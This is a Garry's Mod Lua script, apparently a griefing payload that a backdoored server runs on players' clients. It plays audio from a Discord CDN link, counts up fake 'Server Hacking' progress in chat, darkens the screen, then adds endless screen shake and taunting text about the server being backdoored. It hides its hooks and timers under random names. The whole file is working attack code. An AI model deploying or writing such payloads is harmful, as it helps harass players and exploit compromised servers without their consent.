-- Settings local dropt = 31 local songurl = "https://cdn.discordapp.com/attachments/1215397688691138590/1319550096320495699/Where_did_i_go_wrong_How_to_save_a_life_mixx.wav?ex=67665e4b&is=67650ccb&hm=9e7b5ad4fa7c7b89c9e432b2aa3e4451f851b36de8555728856e5a9548b360b6&" local messages = {"Fucked", "I Think Ur Servers Backdoored...", "Cant find the backdoor? Poor you!", "Caught backdoored in 4k"} local MainMessage = "Started Server Hacking..." local FinalMessage = "Server Fucked" -- Dont Edit local tick = 0 local clr1 = 0 local clr2 = 0 local clr3 = 0 -- Others local function gString(l) local s = "" for i=1,l do s = s .. string.char(math.random(97,97+25)) end return s end sound.PlayURL(songurl,"mono", function(s) s:Play() end) -- Playing Song local br = { [ "$pp_colour_addr" ] = 0, [ "$pp_colour_addg" ] = 0, [ "$pp_colour_addb" ] = 0, [ "$pp_colour_brightness" ] = 0, [ "$pp_colour_contrast" ] = 1, [ "$pp_colour_colour" ] = 1, [ "$pp_colour_mulr" ] = 0, [ "$pp_colour_mulg" ] = 0, [ "$pp_colour_mulb" ] = 0 } local rnd = gString(99) hook.Add("RenderScreenspaceEffects", rnd, function() -- Rendering Screen Effects DrawColorModify(br) end) timer.Create(rnd, (dropt / 100), 100, function() -- Chat / Climax clr1 = clr1 + 2.55 clr2 = clr2 + 2.55 clr3 = clr3 + 2.55 tick = tick + 1 br["$pp_colour_colour"] = br["$pp_colour_colour"] - 0.0075 br["$pp_colour_contrast"] = br["$pp_colour_contrast"] - 0.0075 chat.AddText(Color(clr1,clr2,clr3), MainMessage.." "..tick.."%") end) timer.Simple(dropt+dropt/100, function() -- Drop Effects chat.AddText(Color(clr1,clr2,clr3), FinalMessage.."!") hook.Add("Tick", rnd, function() util.ScreenShake(LocalPlayer():GetPos(), 33, 33, 1, 100) end) hook.Add("HUDPaint", rnd, function() for i=1,#messages do draw.DrawText(messages[i], "TargetID", math.random(0,1700), math.random(0,800), Color(255,255,255,math.random(150,255)), TEXT_ALIGN_CENTER) end end) end)